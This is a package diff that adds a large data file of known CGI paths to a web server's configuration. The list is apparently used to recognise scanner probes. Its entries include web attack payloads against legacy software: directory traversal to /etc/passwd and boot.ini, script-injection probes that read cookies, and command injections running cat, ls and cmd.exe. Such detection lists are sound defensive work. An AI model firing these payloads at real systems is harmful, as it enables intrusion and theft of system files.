itsi-server 0.1.19 → 0.1.20

data/lib/itsi/server/config/known_paths/cgi/CGI_XPlatform.txt

@@ -0,0 +1,3948 @@
+# fuzz inside cgi directories - on windows, this is usually /scripts /bin /cgi or /cgi-bin, on unix, usually /cgi-bin /cgi or /nph-cgi
+14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
+14all.cgi?cfg=../../../../../../../../etc/passwd
+666%0a%0a<script>alert('Vulnerable');</script>666.jsp
+852566C90012664F
+</etc/passwd>
+<script>alert('Vulnerable')</script>
+<script>alert('Vulnerable')</script>.aspx
+<script>alert('Vulnerable')</script>.jsp
+<script>alert('Vulnerable')</script>.shtm
+<script>alert('Vulnerable')</script>.shtml
+<script>alert('Vulnerable')</script>.stm
+<script>alert('Vulnerable')</script>.thtml
+?D=A
+?M=A
+?N=D
+?Open
+?OpenServer
+?PageServices
+?S=A
+?\"><script>alert('Vulnerable');</script>
+?mod=<script>alert(document.cookie)</script>&op=browse
+?mod=node&nid=some_thing&op=view
+?mod=some_thing&op=browse
+?pattern=/etc/*&sort=name
+?sql_debug=1
+?wp-cs-dump
+ADMINconfig.php
+ASP/cart/database/metacart.mdb
+AT-admin.cgi
+AT-generate.cgi
+Admin/
+Admin_files/
+Admin_files/order.log
+Administration/
+Agent/
+Agentes/
+Agents/
+Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
+AnyBoard.cgi
+AnyForm
+AnyForm2
+Asp/
+BACLIENT
+Backup/add-passwd.cgi
+C
+CFIDE/administrator/index.cfm
+CFIDE/probe.cfm
+COM
+CSMailto.cgi
+CSMailto/CSMailto.cgi
+CSNews.cgi
+CVS/Entries
+Cgitest.exe
+Citrix/ICAWEB/
+Citrix/MetaFrameXP/default/login.asp
+Citrix/PNAgent/
+Config1.htm
+Count.cgi
+DB4Web/10.10.10.10:100
+DC
+DCFORM
+DCFORMS98.CGI
+DCShop/auth_data/auth_user_file.txt
+DCShop/orders/orders.txt
+DEASAppDesign.nsf
+DEASLog.nsf
+DEASLog01.nsf
+DEASLog02.nsf
+DEASLog03.nsf
+DEASLog04.nsf
+DEASLog05.nsf
+DEESAdmin.nsf
+DMR/
+Data/settings.xml+
+DomainFiles/*//../../../../../../../../../../etc/passwd
+EXE/
+Excel/
+File
+FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
+FileSeek.cgi?head=&foot=;cat%20/etc/passwd
+FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
+FileSeek.cgi?head=;cat%20/etc/passwd|&foot=
+FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
+FileSeek2.cgi?head=&foot=;cat%20/etc/passwd
+FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
+FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=
+FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com
+FormMail.cgi?<script>alert(\
+FormMail.pl
+GW5/GWWEB.EXE
+GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
+GW5/GWWEB.EXE?HELP=bad-request
+GWWEB.EXE?HELP=bad-request
+Gozila.cgi
+HyperStat/stat_what.log
+IBMWebAS/
+IBMWebAS/apidocs/
+IBMWebAS/configDocs/
+IBMWebAS/docs/
+IBMWebAS/mbeanDocs/
+IDSWebApp/IDSjsp/Login.jsp
+ISSamples/SQLQHit.asp
+ISSamples/sqlqhit.asp
+IlohaMail/blank.html
+ImageFolio/admin/admin.cgi
+JUNK(10)
+JUNK(10)abcd.html
+JUNK(223)<font%20size=50><script>alert('Vulnerable')</script><!--//--
+JUNK(223)<font%20size=50>DEFACED<!--//--
+JUNK(5).csp
+JUNK(5).htw
+JUNK(5).xml
+JUNK(5)/
+JUNK(6).cfm?mode=debug
+LOGIN.PWD
+LWGate
+LWGate.cgi
+LiveHelp/
+MIDICART/midicart.mdb
+MSword/
+MWS/HandleSearch.html?searchTarget=test&B1=Submit
+Mem/dynaform/FileExplorer.htm
+Mem/dynaform/Login.htm?WINDWEB_URL=%2FMem%2Fdynaform%2FLogin.htm&ListIndexUser=0&sWebParam1=admin000
+MsmMask.exe
+MsmMask.exe?mask=/junk334
+Msword/
+NUKEbb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
+NUKEbbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
+NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
+NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
+NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
+NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
+NUKEviewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
+NUKEviewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
+NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
+NULL.printer
+NetDetector/middle_help_intro.htm
+NetDynamic/
+NetDynamics/
+OA_HTML/
+OA_HTML/META-INF/
+OA_HTML/PTB/ECXOTAPing.htm
+OA_HTML/PTB/ICXINDEXBASECASE.htm
+OA_HTML/PTB/mwa_readme.htm
+OA_HTML/PTB/xml_sample1.htm
+OA_HTML/_pages/
+OA_HTML/jsp/
+OA_HTML/jsp/fnd/fndhelp.jsp?dbc=/u01/oracle/prodappl/fnd/11.5.0/secure/dbprod2_prod.dbc
+OA_HTML/jsp/fnd/fndhelputil.jsp
+OA_HTML/jsp/fnd/fndversion.jsp
+OA_HTML/jsp/por/services/login.jsp
+OA_HTML/jsp/wf/WFReassign.jsp
+OA_HTML/oam/
+OA_HTML/oam/weboam.log
+OA_HTML/webtools/doc/index.html
+OA_JAVA/
+OA_JAVA/Oracle/
+OA_JAVA/oracle/forms/registry/Registry.dat
+OA_JAVA/servlet.zip
+OA_MEDIA/
+OpenFile.aspx?file=../../../../../../../../../../boot.ini
+OpenTopic
+Orders/order_log.dat
+Orders/order_log_v12.dat
+PDG_Cart/
+PDG_Cart/oder.log
+PDG_Cart/shopper.conf
+PHPMYADMINdb_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc
+PHPMYADMINexport.php?what=../../../../../../../../../../../../etc/passwd%00
+POSTNUKEMy_eGallery/public/displayCategory.php
+PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
+PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd
+Page/1,10966,,00.html?var=<script>alert('Vulnerable')</script>
+Pages/
+Pbcgi.exe
+ProductCart/pc/msg.asp?|-|0|404_Object_Not_Found
+Program%20Files/
+README
+README.TXT
+ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
+SGB_DIR/superguestconfig
+SPHERA/login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script>
+SPHERA/login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script>
+SQLQHit.asp
+SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3
+SUNWmc/htdocs/
+SUNWmc/htdocs/en_US/
+Search
+SetSecurity.shm
+SilverStream
+SilverStream/Meta/Tables/?access-mode=text
+Site/biztalkhttpreceive.dll
+SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator
+SiteScope/htdocs/SiteScope.html
+SiteServer/Admin/commerce/foundation/DSN.asp
+SiteServer/Admin/commerce/foundation/domain.asp
+SiteServer/Admin/commerce/foundation/driver.asp
+SiteServer/Admin/knowledge/dsmgr/default.asp
+SiteServer/Admin/knowledge/dsmgr/users/GroupManager.asp
+SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp
+SiteServer/Admin/knowledge/persmbr/VsLsLpRd.asp
+SiteServer/Admin/knowledge/persmbr/VsPrAuoEd.asp
+SiteServer/Admin/knowledge/persmbr/VsTmPr.asp
+SiteServer/Admin/knowledge/persmbr/vs.asp
+SiteServer/Knowledge/Default.asp?ctr=\"><script>alert('Vulnerable')</script>
+SiteServer/Publishing/ViewCode.asp
+SiteServer/admin/
+SiteServer/admin/findvserver.asp
+Sites/Knowledge/Membership/Inspired/ViewCode.asp
+Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
+Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp
+Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
+Sites/Samples/Knowledge/Push/ViewCode.asp
+Sites/Samples/Knowledge/Search/ViewCode.asp
+Sources/
+Statistics/
+Stats/
+StoreDB/
+Survey/Survey.Htm
+TopSitesdirectory/help.php?sid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
+USER/CONFIG.AP
+Upload.pl
+VBZooM/add-subject.php
+Vs
+VsSetCookie.exe?
+W
+WEB-INF./web.xml
+WEB-INF/web.xml
+WEBAGENT/CQMGSERV/CF-SINFO.TPF
+WINDMAIL.EXE?%20-n%20c:\boot.ini%
+WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\
+WS_FTP.LOG
+WS_FTP.ini
+WebAdmin.dll?View=Logon
+WebCacheDemo.html
+WebShop/
+WebShop/logs/cc.txt
+WebShop/templates/cc.txt
+WebSphereSamples
+WebTrend/
+Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html
+Web_store/
+Webnews.exe
+XMBforum/buddy.php
+XMBforum/member.php
+XSQLConfig.xml
+Xcelerate/LoginPage.html
+YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc
+YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00
+YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>
+YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('XSS')</script>
+[SecCheck]/..%252f..%252f../ext.ini
+[SecCheck]/..%255c..%255c../ext.ini
+[SecCheck]/..%2f../ext.ini
+\"><img%20src=\"javascript:alert(document.domain)\">
+_cti_pvt/
+_head.php
+_layouts/alllibs.htm
+_layouts/settings.htm
+_layouts/userinfo.htm
+_mem_bin/
+_mem_bin/FormsLogin.asp
+_mem_bin/auoconfig.asp
+_mem_bin/formslogin.asp?\"><script>alert('Vulnerable')</script>
+_mem_bin/remind.asp
+_pages
+_pages/_demo/
+_pages/_demo/_sql/
+_pages/_webapp/_admin/_showjavartdetails.java
+_pages/_webapp/_admin/_showpooldetails.java
+_pages/_webapp/_jsp/
+_private/
+_private/_vti_cnf/
+_private/form_results.htm
+_private/form_results.html
+_private/form_results.txt
+_private/orders.htm
+_private/orders.txt
+_private/register.htm
+_private/register.txt
+_private/registrations.htm
+_private/registrations.txt
+_vti_bin/
+_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
+_vti_bin/CGImail.exe
+_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listInclude
+_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listInclude
+_vti_bin/_vti_aut/dvwssr.dll
+_vti_bin/_vti_aut/fp30reg.dll
+_vti_bin/_vti_aut/fp30reg.dll?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+_vti_bin/_vti_cnf/
+_vti_bin/admin.pl
+_vti_bin/cfgwiz.exe
+_vti_bin/contents.htm
+_vti_bin/fpadmin.htm
+_vti_bin/fpcount.exe
+_vti_bin/fpcount.exe/
+_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
+_vti_bin/fpremadm.exe
+_vti_bin/fpsrvadm.exe
+_vti_bin/shtml.dll/_vti_rpc
+_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
+_vti_bin/shtml.exe/_vti_rpc
+_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
+_vti_bin/shtml.exe/junk_nonexistant.exe
+_vti_cnf/_vti_cnf/
+_vti_inf.html
+_vti_log/_vti_cnf/
+_vti_pvt/access.cnf
+_vti_pvt/administrators.pwd
+_vti_pvt/authors.pwd
+_vti_pvt/botinfs.cnf
+_vti_pvt/bots.cnf
+_vti_pvt/deptodoc.btr
+_vti_pvt/doctodep.btr
+_vti_pvt/linkinfo.cnf
+_vti_pvt/service.cnf
+_vti_pvt/service.pwd
+_vti_pvt/services.cnf
+_vti_pvt/services.org
+_vti_pvt/svacl.cnf
+_vti_pvt/users.pwd
+_vti_pvt/writeto.cnf
+_vti_txt/
+_vti_txt/_vti_cnf/
+a%5c.aspx
+a.jsp/<script>alert('Vulnerable')</script>
+a/
+a1disp3.cgi?../../../../../../../../../../etc
+a1disp3.cgi?../../../../../../../../../../etc/passwd
+a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
+a1stats/a1disp3.cgi?../../../../../../../../../../passwd
+a1stats/a1disp3.cgi?../../../../../../../etc/passwd
+a1stats/a1disp4.cgi?../../../../../../../etc/passwd
+a?<script>alert('Vulnerable')</script>
+a_domlog.nsf
+a_security.htm
+ab2/Help_C/\@Ab2HelpSearch?scope=HELP&DwebQuery=<script>alert(Vulnerable)</script>
+ab2/\@AdminAddadmin?uid=foo&password=bar&re_password=bar
+ab2/\@AdminViewError
+abonnement.asp
+acart2_0/acart2_0.mdb
+acart2_0/admin/category.asp
+acart2_0/admin/error.asp?msg=<script>alert(\"test\")</script>
+acart2_0/admin/index.asp?msg=<script>alert(\"test\")</script>
+acart2_0/deliver.asp?msg=<script>alert(\"test\")</script>
+acart2_0/error.asp?msg=<script>alert(\"test\")</script>
+acart2_0/signin.asp?msg=<script>alert(\"test\")</script>
+acartpath/signin.asp?|-|0|404_Object_Not_Found
+acceso/
+access-log
+access.log
+access/
+access_log
+acciones/
+account.nsf
+account/
+accounting/
+accounts.nsf
+accounts/getuserdesc.asp
+achievo//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/
+active.log
+activex/
+add.php
+add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script>
+add_acl
+add_ftp.cgi
+add_user.php
+addbanner.cgi
+addressbook.php?\"><script>alert(Vulnerable)</script><!--
+addressbook/index.php?name=<script>alert('Vulnerable')</script>
+addressbook/index.php?surname=<script>alert('Vulnerable')</script>
+adduser.cgi
+addyoursite.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt;
+adm/
+admbrowse.php?down=1&amp;cur=%2Fetc%2F&amp;dest=passwd&amp;rid=1&amp;S=[someid]
+admcgi/contents.htm
+admcgi/scripts/Fpadmcgi.exe
+admentor/adminadmin.asp
+admin-serv/config/admpw
+admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv
+admin.cgi
+admin.cgi?list=../../../../../../../../../../etc
+admin.cgi?list=../../../../../../../../../../etc/passwd
+admin.htm
+admin.html
+admin.nsf
+admin.php
+admin.php3
+admin.php4?reg_login=1
+admin.php?en_log_id=0&action=config
+admin.php?en_log_id=0&action=users
+admin.pl
+admin.shtml
+admin/
+admin/admin.php?adminpy=1
+admin/admin.shtml
+admin/admin_phpinfo.php4
+admin/adminproc.asp
+admin/aindex.htm
+admin/auth.php
+admin/browse.asp?FilePath=c:\&Opt=2&level=0
+admin/cfg/configscreen.inc.php+
+admin/cfg/configsite.inc.php+
+admin/cfg/configsql.inc.php+
+admin/cfg/configtache.inc.php+
+admin/cms/htmltags.php
+admin/contextAdmin/contextAdmin.html
+admin/cplogfile.log
+admin/credit_card_info.php
+admin/database/wwForum.mdb
+admin/datasource.asp
+admin/db.php
+admin/db.php?dump_sql=1
+admin/exec.php3
+admin/exec.php3?cmd=cat%20/etc/passwd
+admin/exec.php3?cmd=dir%20c:\
+admin/index.php
+admin/login.php?action=insert&username=test&password=test
+admin/login.php?path=\"></form><form
+admin/modules/cache.php+
+admin/objects.inc.php4
+admin/phpinfo.php
+admin/script.php
+admin/settings.inc.php+
+admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&Retur
+admin/system.php3?cmd=cat%20/etc/passwd
+admin/system.php3?cmd=dir%20c:\
+admin/system_footer.php
+admin/templates/header.php
+admin/upload.php
+admin/wg_user-info.ml
+admin4.nsf
+admin5.nsf
+admin_t/include/aff_liste_langue.php
+adminhot.cgi
+administration/
+administrator/
+administrator/gallery/gallery.php?directory=\"<script>alert(document.cookie)</script>
+administrator/gallery/navigation.php?directory=\"<script>alert(document.cookie)</script>
+administrator/gallery/uploadimage.php
+administrator/gallery/uploadimage.php?directory=\"<script>alert(document.cookie)</script>
+administrator/gallery/view.php?path=\"<script>alert(document.cookie)</script>
+administrator/popups/sectionswindow.php?type=web&link=\"<script>alert(document.cookie)</script>
+administrator/upload.php?newbanner=1&choice=\"<script>alert(document.cookie)</script>
+adminwww.cgi
+admisapi/fpadmin.htm
+adovbs.inc
+adsamples/config/site.csc
+adv/gm001-mc/
+advwebadmin/
+advworks/equipment/catalog_type.asp
+af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
+aff_news.php
+affich.php?image=<script>alert(document.cookie)</script>
+agentadmin.php
+agentes/
+agentrunner.nsf
+aglimpse
+aglimpse.cgi
+akopia/
+aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</script>
+albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd
+alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,
+alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
+alog.nsf
+amadmin.pl
+ammerum/
+anacondaclip.pl?template=../../../../../../../../../../etc
+anacondaclip.pl?template=../../../../../../../../../../etc/passwd
+analog/
+ans.pl?p=../../../../../usr/bin/id|&blah
+ans/ans.pl?p=../../../../../usr/bin/id|&blah
+anthill/login.php
+antispam/listdel?file=blacklist&name=b<script>alert('Vulnerable')</script>&startline=0
+antispam/listdel?file=whitelist&name=a<script>alert('Vulnerable')</script>&startline=0(naturally)
+anyboard.cgi
+apache/
+apex/
+apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
+aplogon.html
+app/
+appdet.html
+applicattion/
+applicattions/
+applist.asp
+approval/ts_app.htm
+apps/
+apps/web/index.fcgi?servers=&section=<script>alert(document.cookie)</script>
+apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script>
+archie
+architext_query.cgi
+architext_query.pl
+archivar/
+archive.asp
+archive/
+archive/a_domlog.nsf
+archive/l_domlog.nsf
+archive_forum.asp
+archives/
+archivo/
+ariadne/
+article.cfm?id=1'<script>alert(document.cookie);</script>
+article.php?article=4965&post=1111111111
+article.php?sid=\"><Img
+ash
+ashnews.php
+asp/
+asp/SQLQHit.asp
+asp/sqlqhit.asp
+astrocam.cgi
+atc/
+athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
+athenareg.php?pass=%20;cat%20/etc/passwd
+atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL
+atomicboard/index.php?location=../../../../../../../../../../etc/passwd
+auction/auction.cgi?action=
+auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir=
+auctiondeluxe/auction.pl
+auktion.cgi?menue=../../../../../../../../../../etc
+auktion.cgi?menue=../../../../../../../../../../etc/passwd
+auth.inc.php
+auth/
+auth_data/auth_user_file.txt
+author.asp
+autohtml.php?op=modload&mainfile=x&name=/etc/passwd
+autologon.html?10514
+awebvisit.stat
+awl/auctionweaver.pl
+awstats.pl
+awstats/awstats.pl
+ax-admin.cgi
+ax.cgi
+axis-cgi/buffer/command.cgi
+axs.cgi
+ayuda/
+b2-include/b2edit.showposts.php
+b2-tools/gm-2-b2.php
+ba4.nsf
+backdoor/
+backup/
+badmin.cgi
+bak/
+ban.bak
+ban.dat
+ban.log
+banca/
+banco/
+bandwidth/index.cgi
+bank/
+banmat.pwd
+banner.cgi
+bannereditor.cgi
+banners.php?op=EmailStats&cid=1%20AND%20passwd%20LIKE%20'a%'/*
+base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1
+bash
+basilix.php3
+basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu
+basilix/
+basilix/compose-attach.php3
+basilix/mbox-list.php3
+basilix/message-read.php3
+bb-ack.sh
+bb-dnbd/faxsurvey
+bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
+bb-hist?HI
+bb-hist?HISTFILE=../../../../../../../../../../etc/passwd
+bb-histlog.sh
+bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd
+bb-rep.sh
+bb-replog.sh
+bb000001.pl<script>alert('Vulnerable')</script>
+bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
+bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
+bbs_forum.cgi
+bbv/
+bc4j.html
+bdata/
+bdatos/
+beta/
+betsie/parserl.pl/<script>alert('Vulnerable')</script>;
+betsie/parserl.pl/<script>alert('XSS')</script>;
+bigconf.cgi
+bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=
+bigsam_guestbook.php?displayBegin=9999...9999
+billing.nsf
+billing/billing.apw
+bin/
+bin/CGImail.exe
+bin/admin.pl
+bin/cfgwiz.exe
+bin/common/user_update_passwd.pl
+bin/contents.htm
+bin/fpadmin.htm
+bin/fpremadm.exe
+bin/fpsrvadm.exe
+bizdb1-search.cgi
+biztalktracking/RawCustomSearchField.asp?|-|0|404_Object_Not_Found
+biztalktracking/rawdocdata.asp?|-|0|404_Object_Not_Found
+blah-whatever-badfile.jsp
+blah-whatever.jsp
+blah123.php
+blah_badfile.shtml
+blahb.ida
+blahb.idq
+blog/
+blog/mt-check.cgi
+blog/mt-load.cgi
+blog/mt.cfg
+bmp/
+bmp/JSPClient.java
+bmp/README.txt
+bmp/global-web-application.xml
+bmp/mime.types
+bmp/setconn.jsp
+bmp/sqljdemo.jsp
+bnbform
+bnbform.cgi
+board/index.php
+board/philboard_admin.asp+
+boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../boot.ini&NFuse_CurrentFolder=/
+boilerplate.asp?NFuse_Template=../../boot.ini&amp;NFuse_CurrentFolder=/SSLx0020Directories|-|0|404_Object_Not_Found
+book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
+bookmark.nsf
+books.nsf
+boot/
+boozt/admin/index.cgi?section=5&input=1
+bottom.html
+bsguest.cgi?email=x;ls
+bslist.cgi?email=x;ls
+buddies.blt
+buddy.blt
+buddylist.blt
+bugs/forgot_password.php?email=\"><script>alert(document.cookie)</script>
+bugs/index.php?err=3&email=\"><script>alert(document.cookie)</script>
+bugtest+/+
+build.cgi
+bulk/bulk.cgi
+busytime.nsf
+buy/
+buynow/
+bytehoard/index.php?infolder=../../../../../../../../../../../etc/
+c/
+c/winnt/system32/cmd.exe?/c+dir+/OG
+c32web.exe/ChangeAdminPassword
+c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf 
+c_download.cgi
+ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini
+ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd
+ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini
+ca000001.pl?ACTION=SHOWCART&hop=\"><script>alert('Vulnerable')</script>&PATH=acatalog%2f
+ca000007.pl?ACTION=SHOWCART&REFPAGE=\"><script>alert('Vulnerable')</script>
+cache-stats/
+cached_feed.cgi
+cachemgr.cgi
+caja/
+cal_make.pl?p0=../../../../../../../../../../etc
+cal_make.pl?p0=../../../../../../../../../../etc/passwd%00
+calendar
+calendar.nsf
+calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
+calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05
+calendar.pl
+calendar/calendar_admin.pl?config=|cat%20/etc/passwd|
+calendar/index.cgi
+calendar_admin.pl?config=|cat%20/etc/passwd|
+calender_admin.pl
+campas?%0acat%0a/etc/passwd%0a
+carbo.dll
+card/
+cards/
+cart.pl
+cart.pl?db='
+cart/
+cart32.exe
+cartcart.cgi
+cartmanager.cgi
+cash/
+catalog.nsf
+catalog/includes/include_once.php
+categorie.php3?cid=june
+catinfo
+catinfo?<u><b>TESTING
+caupo/admin/admin_workspace.php
+cbmc/forums.cgi
+cbms/cbmsfoot.php
+cbms/changepass.php
+cbms/editclient.php
+cbms/passgen.php
+cbms/realinv.php
+cbms/usersetup.php
+ccard/
+ccbill-local.cgi?cmd=MENU
+ccbill-local.pl?cmd=MENU
+ccbill/secure/ccbill.log
+ccbill/whereami.cgi
+cd-cgi/sscd_suncourier.pl
+cd/
+cdrom/
+cehttp/property/
+cehttp/trace
+cersvr.nsf
+cert/
+certa.nsf
+certificado/
+certificate
+certificates
+certlog.nsf
+certsrv.nsf
+certsrv/..%255cwinnt/system32/cmd.exe?/c+dir
+certsrv/..%c0%af../winnt/system32/cmd.exe?/c+dir
+cfcache.map
+cfdocs.map
+cfdocs/cfcache.map
+cfdocs/cfmlsyntaxcheck.cfm
+cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\boot.ini
+cfdocs/exampleapp/email/application.cfm
+cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
+cfdocs/exampleapp/publish/admin/addcontent.cfm
+cfdocs/exampleapp/publish/admin/application.cfm
+cfdocs/examples/httpclient/mainframeset.cfm
+cfdocs/expeval/displayopenedfile.cfm
+cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini
+cfdocs/expeval/openfile.cfm
+cfdocs/expeval/sendmail.cfm
+cfdocs/snippets/evaluate.cfm
+cfdocs/snippets/fileexists.cfm
+cfdocs/snippets/gettempdirectory.cfm
+cfdocs/snippets/viewexample.cfm
+cfgwiz.exe
+cfide/Administrator/startstop.html
+cfide/administrator/index.cfm
+cgforum.cgi
+cgi-bin-sdb/printenv
+cgi-bin/
+cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1
+cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1
+cgi-bin/%2e%2e/abyss.conf
+cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+cgi-bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
+cgi-bin/../../../../../../../../../../WINNT/system32/ipconfig.exe
+cgi-bin/.access
+cgi-bin/.cobalt
+cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')>
+cgi-bin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>
+cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28%27alert%27%29%3B%3C/script%3E
+cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
+cgi-bin/.fhp
+cgi-bin/.htaccess
+cgi-bin/.htaccess.old
